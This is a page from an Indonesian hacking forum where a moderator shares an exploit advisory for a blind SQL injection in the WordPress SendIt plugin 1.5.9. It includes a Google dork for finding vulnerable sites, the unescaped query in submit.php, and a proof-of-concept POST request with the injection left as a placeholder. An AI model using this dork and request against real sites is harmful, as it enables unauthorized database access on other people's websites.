.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

  Threaded Mode | Linear Mode WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability

Go down 
PengirimMessage
Black.exe
Global Mod
Global Mod
Black.exe


Jumlah posting : 844
Points : 1491
Reputation : 44
Join date : 08.01.11
Age : 35

 Threaded Mode | Linear Mode WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability Empty
PostSubyek: Threaded Mode | Linear Mode WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability    Threaded Mode | Linear Mode WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability Icon_minitimeTue Nov 29, 2011 1:46 pm

nih gan mau share exploit keren banget dah :jempol

Quote :
Exploit Title: WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability

# Google Dork: inurl:"wp-content/plugins/sendit/submit.php"

# Date: 2011-08-25

# Author: evilsocket ( evilsocket [at] gmail [dot] com )

# Software Link: http://wordpress.org/extend/plugins/sendit/

# Version: 1.5.9 (tested with magic quotes OFF)


---------------
Vulnerable code
---------------

[ submit.php line 27 ]

$user_count = $wpdb->get_var("SELECT COUNT(*) FROM $table_email where email ='$_POST[email_add]' and id_lista = '$_POST[lista]';");


As you can see, $_POST[lista] parameter is nor validated neither escaped, so you can blind sql inject it using $user_count for the
boolean condition checking :


[ submit.php line 29 ]

if($user_count>0) :
$errore_presente = "<div class=\"error\">".__('email address already present', 'sendit')."</div>";
die($errore_presente);

---
[-] PoC
---

[-] POST:

email_add = some.random.regexp.valid.email@domain.ltd
lista = BLIND SQL INJECTION HERE

TO: http://www.site.com/wp-content/plugins/submit.php
Kembali Ke Atas Go down
 
Threaded Mode | Linear Mode WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
» Wordpress Plugin EasyComment Upload Vulnerability
» MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
» hack wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection
» Hack WordPress yang menggunakan plugin Omni Secure Files Plugin 0.1.13 dengan memanfaatkan celah Arbitrary File Upload

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: